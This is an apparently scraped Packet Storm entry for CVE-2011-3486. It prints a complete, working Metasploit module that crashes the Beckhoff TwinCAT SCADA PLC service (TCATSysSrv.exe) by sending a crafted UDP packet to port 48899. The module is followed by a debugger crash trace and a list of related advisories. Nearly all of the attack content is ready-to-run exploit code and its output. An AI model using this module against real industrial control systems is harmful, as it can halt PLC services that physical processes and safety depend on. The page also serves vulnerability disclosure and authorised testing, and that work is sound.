Lucene search
Luigi Auriemma, jfa, metasploit.comPACKETSTORM:180486HistoryAug 31, 2024 - 12:00 a.m.
Beckhoff TwinCAT SCADA PLC 2.11.0.2004 Denial Of Service
2024-08-3100:00:00
Luigi Auriemma, jfa, metasploit.com
packetstormsecurity.com
16
beckhoff twincat
scada plc
denial of service
udp packet
port 48899
tcatsyssrv.exe
CVSS2
5
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:N/A:P
AI Score
7
Confidence
Low
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Udp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Beckhoff TwinCAT SCADA PLC 2.11.0.2004 DoS',
'Description' => %q{
The Beckhoff TwinCAT version <= 2.11.0.2004 can be brought down by sending
a crafted UDP packet to port 48899 (TCATSysSrv.exe).
},
'Author' =>
[
'Luigi Auriemma', # Public exploit
'jfa', # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2011-3486' ],
[ 'OSVDB', '75495' ],
[ 'URL', 'http://aluigi.altervista.org/adv/twincat_1-adv.txt' ]
],
'DisclosureDate' => '2011-09-13'
))
register_options([Opt::RPORT(48899)])
end
def run
dos = "\x03\x66\x14\x71" + "\x00"*16 + "\xff"*1514
connect_udp
print_status("Sending DoS packet ...")
udp_sock.put(dos)
disconnect_udp
end
end
=begin
0:017> g
(4d4.850): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=02a1f9cf ebx=0037c0a8 ecx=02a0f9cc edx=ffffffff esi=02a0f9b4 edi=00000001
eip=00414f6a esp=02a0f7bc ebp=0000ffff iopl=0 nv up ei pl nz ac po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010213
*** ERROR: Module load completed but symbols could not be loaded for C:\TwinCAT\TCATSysSrv.exe
TCATSysSrv+0x14f6a:
00414f6a 66833802 cmp word ptr [eax],2 ds:0023:02a1f9cf=????
0:016> k
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
02a0f7f8 71ab265b TCATSysSrv+0x14f6a
02a0f80c 71ab4a9e WS2_32!Prolog_v1+0x21
02a0f834 7c90df3c WS2_32!WPUQueryBlockingCallback+0x1b
02a0f880 71a5332f ntdll!NtWaitForSingleObject+0xc
02a0f8f4 71abf6e7 mswsock!WSPRecvFrom+0x35c
02a0f938 71ad303a WS2_32!WSARecvFrom+0x7d
02a0f96c 00414b92 WSOCK32!recvfrom+0x39
02a0f988 00000000 TCATSysSrv+0x14b92
=end
`
Related
metasploit
metasploit
Beckhoff TwinCAT SCADA PLC 2.11.0.2004 DoS
2011-10-10 23:41:15
exploitdb
exploitdb
Beckhoff TwinCAT 2.11.0.2004 - Denial of Service
2011-09-14 00:00:00
checkpoint_advisories
checkpoint_advisories
Beckhoff TwinCAT Out-Of-Bounds Read Denial of Service (CVE-2011-3486)
2012-12-03 00:00:00
ics
ics
Beckhoff TwinCAT Read Access Violation
2018-09-06 12:00:00
nessus
nessus
Beckhoff TwinCAT Read Access Violation (CVE-2011-3486)
2022-02-07 00:00:00
prion
prion
Out-of-bounds
2011-09-16 14:28:00
cvelist
cvelist
CVE-2011-3486
2011-09-16 14:00:00
cve
cve
CVE-2011-3486
2011-09-16 14:28:11
nvd
nvd
CVE-2011-3486
2011-09-16 14:28:11
CVSS2
5
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:N/A:P
AI Score
7
Confidence
Low
Related for PACKETSTORM:180486